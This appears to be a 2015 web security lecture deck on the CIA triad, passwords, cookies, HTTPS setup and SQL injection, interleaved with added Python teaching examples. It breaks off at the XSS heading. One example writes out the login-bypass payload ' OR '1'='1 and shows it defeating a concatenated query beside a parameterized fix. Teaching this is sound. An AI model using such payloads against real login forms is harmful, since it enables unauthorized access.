Web Security
Dr. Theodosis Mourouzis
8 Dec 2015
Web Security Lecture by Dr Theodosis Mourouzis (c)
OUTLINE
• Introduction to Security
• Historical Overview
• Authentication
• Web Architecture
• Threats Landscape
• Secure Online Communication
- Trusted Third Parties (TTP): Certification Authorities (CA)
- SSL/TLS Protocol
- OpenID
OUTLINE
• Web Vulnerabilities
- SQL Injection
- Cross-Site Scripting (XSS)
- Cross-Site Request Forgery (CSRF)
- Account (Username/Password) Enumeration
• Remediation Measures
• PCI-DSS Compliance
• Risk Management Framework
• Conclusions
Instructor (Theodosis Mourouzis)
Academia
• BSc in Mathematics (University of Cambridge)
• MSc in Mathematics (University of Cambridge)
• MRes in Security Science (University College London)
• PhD in Information Security & Cryptography (University College London)
• Several awards in national (CY) competitions in mathematics, physics and statistics; three-time member of the Cyprus National Team at the International Mathematical Olympiad
• Recipient of the UK University Cipher Champion 2013 award
Professional Experience
• Security Architect in a TSB-funded project related to device-centric models
• Security SME in Digital Security & Fraud at Lloyds Banking Group
• Independent Consultant for Security and Analytics
Research Interests
• Fraud Analytics
- Detection of cybersecurity threats
- Use of Big Data and Analytics to detect/prevent fraud
• Security Analysis of Cryptographic Primitives
- Security analysis of systems used for confidentiality and integrity of data
- Russian cryptography (GOST block cipher & hash function)
• Human- and device-centric models for authentication
- Passwords
- Multiple-factor authentication techniques
- Use of the device as a token for authentication, and the biometrics involved
Motivational Example
Once upon a day ... two friends, Alice and Bob, decided to start working on a fabulous start-up idea.
• They connected all major online stores in a clever way and secured goods at very decent prices
• Their idea involved storing (in a database) and processing (online) customers' credit-card information
The Happy Side
• Customers found a lot of value in the idea and the company's website started gaining a lot of reputation.
• Huge traffic every week from all around the world!
• Within a year, they were processing the credit-card data of about 100M users worldwide!
• The start-up was not a start-up anymore ... but a reputable company with over 100 employees.
• All financial consultants were assuring Alice (the CEO of the company) that her company was going to grow a lot in the coming years.
Motivational Example
The Dark Side
• Unfortunately, Bob (who became the CIO of the company) was neither security-aware nor technology-driven
• He declined all financial decisions to enhance the company's online security and information security policy
• One rainy morning ... a malicious hacker managed to penetrate the company's online infrastructure and exposed the database where customers' credit cards were stored
• The malicious hacker easily "unlocked" the password-protected database ... which was protected with the password "BobCIO"
Motivational Example
• The malicious hacker published the database online
• One of the biggest credit-card frauds had just started
• In a few minutes, all the money of about 100M users disappeared
Some really bad consequences for Alice and Bob ...
• The media started reproducing this incident
• People started spoiling the company's reputation
• All major credit-card players declined to collaborate with the company anymore and sued it for breaching the terms and conditions regarding information security compliance
• Financial and credit-card regulators penalised the company with huge fines
• The company eventually went bankrupt and both the CEO and the CIO are facing jail sentences
Motivational Example
What is the meaning of this example?
Do you still think security is a science-fiction thing?
What have you really learned from this?
Recent Breaches
• TalkTalk: telecom company which provides pay TV and internet access
• Occurred: before 23 Oct 2015
• 150K TalkTalk customers affected
• 15,656 bank accounts hacked
• 4% of 4M customers affected
• Hacked twice last year
• Criticised for lack of information security
Recent Breaches
Lots of examples ...
Confidential Data Breaches
Interesting Statistics
• 76% of U.S. companies had a cybersecurity incident within the past 12 months [Source: online.wsj.com]
• 71% of breaches in 2015 occurred in businesses with 100 employees or fewer [Source: Forbes]
• 80% of small businesses that experience a data breach suffer serious financial losses [Source: sileo]
• 22% probability that your company will experience a breach which compromises at least 10K records [Source: Dell]
• It takes 33-365 days for a company to detect or know that it has been breached!
• 70% of security incidents that cost enterprises money involve insiders
Food for thought
By the end of this lecture you need to ask yourself ...
• Do I understand the online threats to my business?
• Do I really understand the potential impact of security on my business?
• Do I know what I can do about it?
Introduction to Security
What is security?
Introduction to Security
[asset]: people, property and information.
• People may include employees and customers, along with other invited persons such as contractors or guests.
• Property assets consist of both tangible and intangible items that can be assigned a value
• Intangible assets include reputation and proprietary information such as databases, software code, critical company records, etc.
Introduction to Security
[Information Security]: the practice of defending information from unauthorized
• Access
• Use
• Disclosure
• Disruption
• Modification
• Inspection
• Recording
• Destruction
• etc. ...
Introduction to Security
Key Concepts
• Confidentiality
• Integrity
• Availability
(known as the CIA triad)
• Non-Repudiation
• Authenticity
Introduction to Security
[confidentiality]
• Preserving authorized restrictions on access and disclosure, including means for protecting personal privacy and proprietary information
• Only the authorized recipient is able to reveal the content of a message that is supposed to be confidential
• A set of rules that limits access and/or places restrictions on certain types of information
• Goes back to the beginning of civilization; lots of techniques were developed during wars
Introduction to Security
[confidentiality] Data Classification
• Restricted
- data protected by state or federal privacy regulations
• Private
- everything not classified as restricted or public
• Public
Introduction to Security
[confidentiality] Detailed Classification Levels
• Top Secret
• Secret
• Confidential
• Restricted
• Official
• Unclassified
• Clearance
Introduction to Security
[integrity]
• Protecting the content of a message from alteration during transit, either on purpose or accidentally
• Guarding against improper information modification or destruction
Introduction to Security
[availability]
• Ensure that the resources that you sell or buy are always available
• Ensure timely and reliable access to and use of information
Introduction to Security
[non-repudiation]
• The sender of a message cannot later deny having sent it
- If you sign a cheque you cannot later deny it
Introduction to Security
[authenticity]
• Make sure that the party is the one it is supposed to be
• Trustworthiness of origins
• Is the page I'm visiting online the one it is supposed to be?
Introduction to Security
... and another requirement which is more business-oriented ...
[continuity]: information should be continuously available to the business user, and this is ensured through appropriate business continuity and disaster preparedness
Historical Overview
• Human desire to communicate secretly is at least as old as writing itself
• This desire goes back to the beginnings of civilization
• The main goal was transmission of messages in the presence of unauthorized parties, especially during military operations
• Methods of secret communication were developed by many ancient societies
[Figure: Alice sends the message "Hi Bob, bla, bla - Alice" to Bob while Eve listens in]
Historical Overview
• Many examples of attempts at secure communication
- Julius Caesar (100 BC)
-- simple substitution (shift) cipher
- WWI: use of radio for exchanging messages
-- need for more secure techniques to prevent interception
- WWII: shift to electromechanical rotor machines
-- the Enigma machine used by the Germans
Historical Overview
• Julius Caesar (100 BC – 44 BC), Roman general and statesman
• He used a technique to send messages in a form that prevented unintended persons from reading them
• Even his messenger was not capable of reading the messages
• The technique is known as the Caesar cipher
Historical Overview
• Message ...
"My spies must send me information regarding rivers, water, mountain coordinates and the time the guards are protecting the main gate"
• What an unintended recipient reads ...
"Pb vslhv pxvw vhqg ph lqirupdwlrq uhjduglqj ulyhuv, zdwhu, prxqwdlq frruglqdwhv dqg wkh wlph wkh jxdugv duh surwhfwlqj wkh pdlq jdwh"
(every letter is shifted three places down the alphabet)
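The following is an added example, not part of the original slides: a working Caesar cipher that reproduces the slide's ciphertext from its plaintext with key 3, and a brute-force breaker that recovers the key by trying all 25 shifts. The short word list used to score candidate decryptions is an assumption made for the example; any English word list would do.

```python
"""Caesar cipher: encryption, decryption and a brute-force break.

Added example for the lecture's Caesar-cipher slide; not from the original
slides. The plaintext in __main__ is the slide's own message and key 3 is the
shift the slide's ciphertext uses. COMMON_WORDS is assumed for the example.
"""
import string

ALPHABET = string.ascii_lowercase


def caesar_shift(text: str, key: int) -> str:
    """Shift every Latin letter by `key` positions; other characters pass through."""
    out = []
    for ch in text:
        if ch.isalpha() and ch.lower() in ALPHABET:
            base = ord("A") if ch.isupper() else ord("a")
            out.append(chr((ord(ch) - base + key) % 26 + base))
        else:
            out.append(ch)
    return "".join(out)


def caesar_encrypt(plaintext: str, key: int) -> str:
    return caesar_shift(plaintext, key)


def caesar_decrypt(ciphertext: str, key: int) -> str:
    return caesar_shift(ciphertext, -key)


# Tiny scoring dictionary (assumed for the example): the breaker picks the key
# whose decryption contains the most of these words.
COMMON_WORDS = {"the", "and", "me", "my", "must", "send", "are", "is", "to"}


def break_caesar(ciphertext: str) -> tuple[int, str]:
    """Try all 25 non-trivial keys and return (key, plaintext) with the best score.

    This is the point of the slide: the key space has 25 entries, so the cipher
    falls to exhaustive search instantly, however long the message is.
    """
    best_key, best_score, best_text = 0, -1, ciphertext
    for key in range(1, 26):
        candidate = caesar_decrypt(ciphertext, key)
        words = candidate.lower().replace(",", " ").split()
        score = sum(1 for w in words if w in COMMON_WORDS)
        if score > best_score:
            best_key, best_score, best_text = key, score, candidate
    return best_key, best_text


if __name__ == "__main__":
    message = ("My spies must send me information regarding rivers, water, "
               "mountain coordinates and the time the guards are protecting the main gate")
    ct = caesar_encrypt(message, 3)
    print(ct)
    key, pt = break_caesar(ct)
    print(f"recovered key={key}: {pt}")
```

Running the block prints the slide's ciphertext and then recovers key 3 and the original message without being told the key.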
Historical Overview
Security evolved tremendously ...
- Simple mathematical rules
-- Electromechanical rotor machines
--- Complex mathematical problems which are hard to solve (elliptic curves, integer factoring)
Historical Overview (Different Notions)
Security through obscurity
• Use of secrecy of the design or implementation to provide security
• Designers of such systems believe that if the flaws are not known, then attackers will be unlikely to find them
• However, such a system might still have theoretical or actual security vulnerabilities
• Sometimes used as a defence-in-depth measure
Historical Overview (Different Notions)
Open Security
• Security through obscurity is discouraged and not recommended by standards bodies
• The National Institute of Standards and Technology (NIST) in the US recommends against this practice: "System security should not depend on the secrecy of the implementation or its components"
• Follow open-source philosophies, methodologies and standards when implementing systems
Historical Overview (Different Notions)
Advantages of Open Security
• Compatible implementations
• Scrutinized and analysed by prominent security experts
• All major flaws and vulnerabilities would be revealed quickly
• Security is collaboratively improved
• Transparency
Risks - Threats - Vulnerabilities
"An asset is what we are trying to protect"
[threat]: anything that can exploit a vulnerability, intentionally or accidentally, and obtain, damage or destroy an asset
"A threat is what we're trying to protect against"
Risks - Threats - Vulnerabilities
Natural Threats: Floods, earthquakes, tornadoes, avalanches
Human Threats: Events that are either enabled by or caused by human beings, such as unintentional acts (inadvertent data entry) or deliberate actions (network-based attacks, malicious software attacks, unauthorized access to confidential information)
Environmental Threats: Long-term power failure, pollution, chemicals, liquid leakage
Risks - Threats - Vulnerabilities
[vulnerability]: a weakness or gap in a security program that can be exploited by threats to gain unauthorized access to an asset
"A vulnerability is a weakness or gap in our protection efforts"
Risks - Threats - Vulnerabilities
[risk]: the potential for loss, damage or destruction of an asset as a result of a threat exploiting a vulnerability
"Risk is the intersection of assets, threats and vulnerabilities"
Risks - Threats - Vulnerabilities
RISK: Business disruption, Financial losses, Loss of privacy, Damage to reputation, Loss of confidence, Legal penalties, Impaired growth, Loss of life
Threats: Angry employees, Dishonest employees, Criminals, Governments, Terrorists, The press, Competitors, Hackers, Nature
Vulnerabilities: Software bugs, Broken processes, Ineffective controls, Hardware flaws, Business change, Legacy systems, Inadequate BCP, Human error
Risks - Threats - Vulnerabilities
NIST threat-vulnerability pairings table:
Authentication
Authentication (from Greek: αὐθεντικός) is the act of confirming the truth of an attribute of a single piece of data claimed true by an entity. It is the process of confirming an identity.
Basic Concepts:
[identification]: declare who you are
[(entity) authentication]: prove it
Authentication
Authentication Factors
• Something the user knows: password, partial password, pass-phrase, Personal Identification Number (PIN), security question
• Something the user has: wrist band, ID card, security token, cell phone with built-in hardware token
• Something the user is: fingerprint, retinal pattern, facial recognition, voice
Authentication
Multiple-Factor Authentication: combining several [INDEPENDENT] authentication techniques together.
Authentication
• [Nowadays] 2-Factor Authentication (2FA) is used to protect money (Internet Banking)
• Shift to 3-Factor quite soon
Authentication
• Even though the authentication area is widely studied, security still relies on passwords
• Password: a string of characters used in authentication to prove identity or access approval, in order to gain access to a resource
• It MUST be as hard as possible for someone to guess it
Authentication
• A lot of research has focused on formalising "password strength"
• Many different metrics/policies to ensure strong passwords have been introduced
• Password strength: the likelihood that a password cannot be guessed; it varies with the attack algorithm used
- too vague!
- more formal definitions based on entropy and randomness were introduced
Authentication
• Policies to ensure strong passwords are very often introduced
• Security awareness campaigns help people select stronger passwords
Authentication
• However, in the end the selection is done by a HUMAN
• We cannot remember long, complex and random-looking strings
• We tend to make selections that are easy to remember
• We tend to use the same passwords across many different sites
Authentication
A very "secure password" is expected to look like ...
A=K2z!43&Z2~B_d4-o3@(5)!h6c7=x08H1
Security Design
• We need systems that are both secure and usable ... otherwise it will lead to failure
• Security and usability often tend to be inversely related, which implies complex engineering problems and a lot of thinking!
• Imagine a system in which you have to type a 30-character password and also carry a security token with you
Authentication
Password Policies
• Password Complexity
- does not contain the name of the user, real name or company name
- at least 8 characters long
- contains characters from three of the following 4 categories
-- Latin uppercase letters (A-Z)
-- Latin lowercase letters (a-z)
-- Base 10 digits (0-9)
-- Special characters (!, $, %, #)
Authentication
Password Policies
• Password Expiration
- change passwords periodically (every 1-6 months)
• Password Use
- avoid using the same password for accessing multiple accounts
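The following is an added example, not from the original slides: it implements the complexity rules of the Password Policies slides (at least 8 characters, three of the four character classes, no user/real/company name) together with the naive entropy estimate that the password-strength slide alludes to, and then shows why a policy-compliant password can still be guessed in seconds. The sample passwords, the forbidden names and the attacker's word list are constructed for the example.

```python
"""Password policy check and a guessability estimate.

Added example for the password-strength and password-policy slides; not from the
original slides. The sample passwords, names and COMMON_BASES are made up.
"""
import math
import string

CLASSES = {
    "upper": set(string.ascii_uppercase),
    "lower": set(string.ascii_lowercase),
    "digit": set(string.digits),
    "special": set("!$%#@^&*()-_+=~`[]{};:'\"?/,.<>\\|"),
}


def check_policy(password: str, forbidden_names=()) -> list[str]:
    """Return the policy rules the password violates (empty list means compliant)."""
    failures = []
    if len(password) < 8:
        failures.append("shorter than 8 characters")
    classes_used = sum(1 for chars in CLASSES.values() if any(c in chars for c in password))
    if classes_used < 3:
        failures.append("uses fewer than 3 of the 4 character classes")
    lowered = password.lower()
    for name in forbidden_names:
        if name and name.lower() in lowered:
            failures.append(f"contains the forbidden name '{name}'")
    return failures


def naive_entropy_bits(password: str) -> float:
    """Entropy if the password were drawn uniformly from the classes it uses.

    This is what simple 'strength meters' compute. It over-estimates human-chosen
    passwords, which is exactly why the slides call the notion too vague.
    """
    pool = sum(len(chars) for chars in CLASSES.values()
               if any(c in chars for c in password))
    return len(password) * math.log2(pool) if pool else 0.0


# Constructed attacker's word list: a dictionary attack tries these first.
COMMON_BASES = ["password", "welcome", "letmein", "qwerty", "admin"]


def guessable_by_dictionary(password: str) -> bool:
    """True if the password is a common word plus trailing digits/symbols,
    a pattern guessed in seconds regardless of what the entropy estimate says."""
    core = password.lower().rstrip(string.digits + string.punctuation)
    return core in COMMON_BASES


def assess(password: str, forbidden_names=()) -> dict:
    return {
        "policy_failures": check_policy(password, forbidden_names),
        "naive_entropy_bits": round(naive_entropy_bits(password), 1),
        "dictionary_guessable": guessable_by_dictionary(password),
    }


if __name__ == "__main__":
    for pw in ["Password1!", "alice2015", "K2z!43&Z2~B_d4-o3@(5)!h6c7=x08H1"]:
        print(pw, assess(pw, forbidden_names=("Alice", "Acme")))
```

"Password1!" satisfies every rule on the slides and scores over 60 bits on the naive meter, yet it is the first thing a dictionary attack tries; the slide's random 33-character string is the only one of the three that resists both checks.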
Web Architecture
A fair introduction
Web Architecture
• An approach to the design and planning of websites that involves technical, aesthetic and functional criteria.
• Focus on the user and on user requirements
- web content
- usability
- interaction design
- information architecture
- web design
- technology stack
Web Architecture
What is a Web Application?
A web application or web service is a software application that is accessible using a web browser or HTTP(S) user agent.
Web Architecture
Client-Server Architecture (two-tier architecture)
• A network architecture in which each computer/process on the network is either a client or a server
• Servers are powerful computers or processes dedicated to managing disk drives, printers or network traffic.
• Clients are PCs or workstations on which users run applications.
Web Architecture
Example: a client needs to access, for example, Wikipedia or shopping websites like Amazon via his/her browser. The web server is responsible for serving the content requested by the user.
Web Architecture
• Web Servers: Apache HTTP Server, Microsoft IIS (Internet Information Services), Sun Java System Web Server
• Database: the DB is a separate entity, logically (and often physically)
• Data: user-side data (e.g. cookies) lives in the browser
Web Architecture
A client requests content by URL (Uniform Resource Locator)
Protocol (scheme): http, https, ftp, ...
Address of the host: translated to an IP address by DNS (e.g. 128.8.127.3)
Web Architecture
Path to a resource
• .../index.html (static content: a fixed file returned by the server)
• .../apple.php (dynamic content: the server generates the content on the fly)
Web Architecture
HTTP (Hypertext Transfer Protocol) is the Internet application protocol used for communication (exchange of data) between client and server. It runs on top of TCP.
Web Architecture
User clicks on a website (HTTP request on button click)
Request contains:
• The URL of the resource
• Headers describing what the browser can do
• Request type: GET (should have no server-side effects), POST (data sent to the server; side effects expected)
Web Architecture
[Figure: HTTP GET request]
[Figure: HTTP POST request]
Web Architecture
A response (after a request) is sent and rendered by the browser
• Response contains:
- Status code: e.g. 200 OK
- Headers describing what the server provides
- Data
- Cookies (state the server would like the browser to keep on its behalf; they maintain the notion of a session)
Web Architecture
COOKIES
• An HTTP cookie is a small piece of data sent from a website and stored in a user's web browser while the user is browsing that website
• Every time the user loads the website, the browser sends the cookie back to the server to notify the website of the user's previous activity
Applications
• Remember stateful information (e.g. items in a shopping cart)
• Record the user's browsing activity
• Third-party tracking cookies, used to compile long-term records of individuals' browsing histories: PRIVACY CONCERN
- EU and US lawmakers took action in 2011 around this
• Storing information such as passwords or credit cards (a practice to avoid: whoever reads the cookie gets the secret)
• Authentication cookies: the most common method used by web servers to know whether or not the user is logged in, and under which account. This helps web servers ensure they send sensitive information only to legitimate users
Web Architecture
COOKIES
• Cookie parameters are set in a Set-Cookie response header: the name=value pair comes first, followed by the attributes
HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: Account=766324; Domain=widget.com; Path=/; Secure
Content-Type: text/html
Content-Length: 327
Date: Tue, 25 Sep 2007 14:15:51 GMT
Web Architecture
COOKIE PARAMETERS
• expires=<date>: determines when the cookie will be deleted
• domain=<domain name>: the cookie will be returned to that domain and to its subdomains (hosts that end in "." followed by this value)
• path=<path name>: the cookie will be returned only for requests whose path starts with this value
• secure: if present, the cookie will be returned only with HTTPS (secure HTTP) requests
• <name>=<value>: allows arbitrary data to be stored in a cookie
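The following is an added example, not from the original slides, covering both the HTTP response slide and the cookie-parameter slide: it parses a raw HTTP response into status, headers and body, extracts each Set-Cookie header into its name/value pair and attributes, applies the domain, path and secure rules to decide whether a browser would send the cookie back, and lists the protective attributes each cookie lacks. RAW_RESPONSE is constructed for the example (it follows the slide's Apache-Coyote response with one extra, deliberately weak cookie added); HttpOnly is not on the slides and is included as the usual companion check.

```python
"""Parse a raw HTTP response and audit its Set-Cookie headers.

Added example for the HTTP-response and cookie-parameter slides; not code from
the original slides. RAW_RESPONSE is constructed for the example.
"""
from dataclasses import dataclass, field

RAW_RESPONSE = (
    "HTTP/1.1 200 OK\r\n"
    "Server: Apache-Coyote/1.1\r\n"
    "Set-Cookie: Account=766324; Domain=widget.com; Path=/; Secure\r\n"
    "Set-Cookie: SESSIONID=abc123; Path=/shop\r\n"      # weak cookie added for the example
    "Content-Type: text/html\r\n"
    "Content-Length: 29\r\n"
    "\r\n"
    "<html>constructed body</html>"
)


@dataclass
class Cookie:
    name: str
    value: str
    domain: str = ""       # empty: host-only cookie (goes back only to the responding host)
    path: str = "/"
    secure: bool = False
    httponly: bool = False


@dataclass
class Response:
    status: int
    reason: str
    headers: list[tuple[str, str]] = field(default_factory=list)
    body: str = ""


def parse_response(raw: str) -> Response:
    """Split status line, headers and body; header names are case-insensitive."""
    head, _, body = raw.partition("\r\n\r\n")
    lines = head.split("\r\n")
    _, status, reason = lines[0].split(" ", 2)
    headers = []
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers.append((name.strip().lower(), value.strip()))
    return Response(int(status), reason, headers, body)


def parse_set_cookie(value: str) -> Cookie:
    """First token is name=value; the remaining ';'-separated tokens are attributes."""
    parts = [p.strip() for p in value.split(";")]
    name, _, val = parts[0].partition("=")
    cookie = Cookie(name=name.strip(), value=val.strip())
    for attr in parts[1:]:
        key, _, v = attr.partition("=")
        key = key.strip().lower()
        if key == "domain":
            cookie.domain = v.strip().lstrip(".").lower()
        elif key == "path":
            cookie.path = v.strip() or "/"
        elif key == "secure":
            cookie.secure = True
        elif key == "httponly":
            cookie.httponly = True
    return cookie


def cookies_of(resp: Response) -> list[Cookie]:
    return [parse_set_cookie(v) for n, v in resp.headers if n == "set-cookie"]


def browser_would_send(cookie: Cookie, scheme: str, host: str, path: str) -> bool:
    """Slide rules: domain match, path prefix match, secure implies HTTPS only.

    The domain match requires a label boundary: widget.com matches shop.widget.com
    but NOT evilwidget.com, which a plain 'ends with' test would wrongly accept.
    """
    host = host.lower()
    if cookie.domain and host != cookie.domain and not host.endswith("." + cookie.domain):
        return False
    if not path.startswith(cookie.path):
        return False
    if cookie.secure and scheme != "https":
        return False
    return True


def audit(resp: Response) -> dict[str, list[str]]:
    """For each cookie, list the protective attributes it lacks."""
    return {
        c.name: [flag for flag, present in (("Secure", c.secure), ("HttpOnly", c.httponly)) if not present]
        for c in cookies_of(resp)
    }


if __name__ == "__main__":
    resp = parse_response(RAW_RESPONSE)
    print(resp.status, resp.reason)
    for c in cookies_of(resp):
        print(c.name, "sent on http://widget.com/shop/cart ->",
              browser_would_send(c, "http", "widget.com", "/shop/cart"))
    print(audit(resp))
```

Running the block shows the Account cookie being withheld on plain HTTP (it carries secure) while SESSIONID is sent in clear, and the audit names the missing attributes for each cookie.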
Threats Landscape
The types of hackers
[Black Hat] A person who hacks into a computer network with malicious or criminal intent.
[Grey Hat] A person whose ethical standards fall somewhere between purely altruistic and purely malicious.
[White Hat] A person who hacks into a computer network in order to test or evaluate the security of the system.
Threats Landscape
Computer system threats come in many forms and in all sorts of shapes and sizes
• software attacks:
- viruses, worms, malware, Trojan horses
- phishing attacks
• intellectual property theft
• identity theft
• theft of equipment or information
• sabotage
• information extortion
Threats Landscape
[Phishing Attack]
An attack that attempts to acquire sensitive information (such as usernames, passwords and credit card details), often for malicious reasons, by impersonating a trustworthy entity in an electronic communication.
It is usually the first step in a larger attack, such as a malware attack.
Threats Landscape
Risk of phishing grows in social media:
Hackers take advantage of social networks to attack people, since people trust these networks and may not be able to tell that the site being visited, or the program being used, is not real.
Threats Landscape
[malware]: short for "malicious software", software which is specifically designed to disrupt or damage a computer system, steal personal information or perform unwanted actions on a computer system
Examples:
• Viruses
• Worms
• Trojans
• Spyware
Source: PandaLabs Security
Threats Landscape
[social engineering]
A non-technical method of attack that relies heavily on human interaction and often involves tricking people into breaking normal security procedures.
It is one of the greatest threats that organizations encounter today.
Secure Online Communication
Suppose that your information is transmitted over the network.
Then, anyone who can intercept the traffic can read all your details.
The solution is cryptography!
But are you sure you are connected to the page you are supposed to connect to?
Secure Online Communication
A Trusted Third Party (TTP) is an entity which facilitates interactions between two parties who both trust the third party.
• It is widely used in the electronic transfer of secure data
• The TTP uses cryptography and other security measures to authenticate the identity of the sender, protect the data during transmission and verify delivery to the intended recipient.
Examples: banks, Certification Authorities (CA)
Secure Online Communication
• The SSL/TLS protocol is responsible for securing data travelling from the user's PC to the server over the internet
• Its primary goal is to provide privacy and data integrity between two communicating computer applications
1. The connection is private because all data is encrypted
2. The identity of the communicating parties is authenticated using certificates issued by a recognized authority (a Certification Authority); on the web it is normally only the server that is authenticated
3. Each message is guaranteed to arrive unchanged at the intended recipient
Secure Online Communication
Setting up SSL (HTTPS) on your website
• If you collect ANY sensitive information (username, password) or are involved in any financial transactions, then you need to enable HTTPS
• Any information going to and from the server is automatically encrypted
• SSL/TLS prevents attackers from sniffing your visitors' sensitive information as it passes across the web
• Visitors feel more secure when the padlock appears, as this means a certificate is protecting the connection
Secure Online Communication
Setting up SSL (HTTPS) on your website
• If you try to open https://www.mywebsite.com now, it will not work
• You need to install an SSL certificate in the first place
• You can set it up in 5 simple steps
- Host with a dedicated IP address
- Buy a certificate
- Activate the certificate
- Install the certificate
- Update your site to use HTTPS
Secure Online Communication
Setting up SSL (HTTPS) on your website
Step 1 [Host with a dedicated IP address]:
• Lots of smaller web hosting plans put you on a shared IP where multiple other websites are using the same location.
• With a dedicated IP you ensure that the traffic going to that IP address is only going to your website and no one else's.
• Caveat: with Server Name Indication (SNI), supported by all modern browsers and servers, many HTTPS sites can share one IP address; a dedicated IP is only strictly needed for very old clients.
Secure Online Communication
Setting up SSL (HTTPS) on your website
Step 2 [Buy a Certificate]:
• Something that proves your website is your website (think of it like an ID card)
• When a user visits your site, the browser trusts the site by checking the certificate, and everything is encrypted after the "handshake"
• You can create a "self-signed" one, but it is not trusted by browsers
• Places to buy certificates
Secure Online Communication
Setting up SSL (HTTPS) on your website
Step 3 [Activate the Certificate]:
• The host can possibly do this for you: check it
• Generate a Certificate Signing Request (CSR) within your hosting control panel, such as WHM or cPanel.
• Go to the SSL/TLS admin area, choose "Generate an SSL certificate and Signing Request" and fill in the form.
• Copy the first block (you need the CSR to give to the certificate issuer to establish your identity), go to the vendor's site where you bought the certificate and pass the CSR and any other fields needed.
• Only the CSR is sent to the issuer; the private key generated alongside it stays on your server and must never be shared.
• It will ask you for an approval email. This email proves you own the domain, e.g. webmaster@domain.com. You need to create it.
Secure Online Communication
Setting up SSL (HTTPS) on your website
Step 4 [Install the certificate]:
• The host might do it for you
• If not, paste the certificate into your web host control panel. If you use WHM/cPanel, click "Install an SSL Certificate" under the SSL/TLS menu
• Paste it and submit
Secure Online Communication
Setting up SSL (HTTPS) on your website
Step 5 [Update your site to use HTTPS]:
• Now https://www.mywebsite.com works
• However, you need to make sure visitors access your site through HTTPS
• You can enable it for all pages, but you can also do it for a subset of them
Example of Apache server configuration (in a .htaccess file) that redirects the cart and checkout paths to HTTPS with a permanent redirect and stops rule processing there:
RewriteEngine On
RewriteCond %{HTTPS} off
RewriteRule ^(cart/|checkout/) https://%{HTTP_HOST}%{REQUEST_URI} [L,R=301]
• If only a subset of pages is served over HTTPS, the session cookie must carry the secure attribute; otherwise the browser sends it in clear on the HTTP pages
Secure Online Communication
Important Stuff
• HTTPS does not protect information on your server. It only protects the TRANSFER of data between your visitor's computer and yours.
• It is your obligation to make sure data is safe on your server
OpenID
• OpenID is an open standard and decentralized authentication protocol promoted by the non-profit OpenID Foundation
• It allows users to be authenticated by co-operating sites, known as Relying Parties (RP), using a third-party service (the identity provider)
OpenID
• The OpenID standard provides a framework for the communication that must take place between the identity provider and the OpenID acceptor (RP)
• An extension to the standard, OpenID Attribute Exchange, facilitates the secure transfer of user attributes, such as name and gender, from the OpenID identity provider to the relying party
• This eliminates the need for webmasters to provide their own ad-hoc systems and allows users to consolidate their "digital identities"
• Users can log into multiple unrelated websites without having to register their information over and over again
OpenID
• Several large organizations either issue or accept OpenIDs on their website, according to the OpenID Foundation
- AOL, Blogger, France Telecom, Google, Microsoft, Yahoo! …
- Facebook stopped using OpenID and uses Facebook Connect
• Users create accounts by selecting an OpenID identity provider and then use those accounts to sign on to any website which accepts OpenID authentication
• You can rely on the security of an OpenID provider, which is assumed to be very secure
Web Security
What is Web Application Security?
Simply, “The security of web applications”
• End User Security and awareness programs reside in the policies, procedures, and awareness layer of the Defense in Depth model
• User security awareness can affect every aspect of an organization’s security profile
• User awareness is a significant part of a comprehensive security profile because many attack types rely on human intervention
Common Web Application Security Mistakes
• Trusting Client-Side Data
-- Do not TRUST client-side data!
-- Identify all input parameters that trust client-side data
-- Check for un-escaped special characters in input strings:
! @ $ % ^ & * ( ) - _ + ` ~ \ | [ ] { } ; : ' " ? / , . > <
• Authentication mechanisms using technologies such as JavaScript or ActiveX (hard for developers to understand attacks such as XSS, XSRF)
• Lack of re-authenticating the user before issuing new passwords or performing critical tasks
• Hosting of uncontrolled data on a protected domain
Beware of Identifiable Characteristics
• Comment Lines
• URL Extensions
• Meta Tags
• Cookies
• Client-side scripting languages
• Error and Response Codes
- HTTP Response Headers
- Error Messages
Username/Password Enumeration
• The attacker will try to send particular requests to the application to check whether it replies in different manners
• The attack works when the message from the web server is different when something is correct and when something is wrong
-- “Invalid Username”, “Incorrect Password”
• The attacker now has some information to proceed with the attack, e.g. a valid username
• The application should not reveal, directly or indirectly, any information useful for enumerating users
• In case of a wrong username/password, the application should return generic messages
SQL Injection
The attack behind most of the data breaches
• Attacker’s target is to extract information from the server’s DB
• It is an input validation vulnerability, where unsanitized user input in an SQL query to the back-end DB changes the meaning of the query
[Figures: Typical Login Prompt; User Input Becomes Part of Query]
[Figures: Malicious User Input; SQL Injection Attack]
CardSystems Attack (June 2005)
CardSystems was a major credit card processing company
Put out of business by a SQL injection attack!
- Credit card numbers stored unencrypted
- Data on 263,000 accounts stolen
- 43M identities exposed
Countermeasures
• Input Validation
- Filter: apostrophes, semicolons, percent symbols, hyphens, any character with special meaning
- Check the data type
• Whitelisting
- Blacklisting “bad” characters does not really work
- Whitelist a well-defined set of safe values
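As an added example (not code from the lecture), the concatenated query construction the SQL Injection slides describe beside its parameterized form, plus a whitelist check of the kind the Countermeasures slide recommends; the users table, the sample credentials and the whitelist pattern are constructed assumptions:

```python
import re
import sqlite3

# Constructed sample data, not from the lecture: an in-memory users table.
def make_db():
    con = sqlite3.connect(":memory:")
    con.execute("CREATE TABLE users (username TEXT, password TEXT)")
    con.execute("INSERT INTO users VALUES ('alice', 'correct horse')")
    con.commit()
    return con

def login_vulnerable(con, username, password):
    """Unsanitized input is pasted into the query text, so an apostrophe in
    the input ends the string literal and the rest changes the query's
    meaning (the lecture's definition of the vulnerability)."""
    query = ("SELECT username FROM users WHERE username = '" + username +
             "' AND password = '" + password + "'")
    return con.execute(query).fetchone() is not None

def login_parameterized(con, username, password):
    """The query text is fixed; the driver binds the values as data, so no
    character the user types can alter the statement."""
    query = "SELECT username FROM users WHERE username = ? AND password = ?"
    return con.execute(query, (username, password)).fetchone() is not None

# Whitelist a well-defined set of safe values rather than blacklisting
# apostrophes, semicolons and the like (constructed policy: 3-32 characters
# of lower-case letters, digits and underscore).
ALLOWED_USERNAME = re.compile(r"[a-z0-9_]{3,32}")

def username_is_whitelisted(username):
    return ALLOWED_USERNAME.fullmatch(username) is not None

if __name__ == "__main__":
    con = make_db()
    # A password field whose apostrophe closes the literal and appends a
    # tautology, making the concatenated WHERE clause always true.
    tautology = "' OR '1'='1"
    print(login_vulnerable(con, "alice", tautology))     # True: check bypassed
    print(login_parameterized(con, "alice", tautology))  # False
    print(username_is_whitelisted("alice"), username_is_whitelisted("alice'--"))
```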
Cross-Site Scripting (XSS)
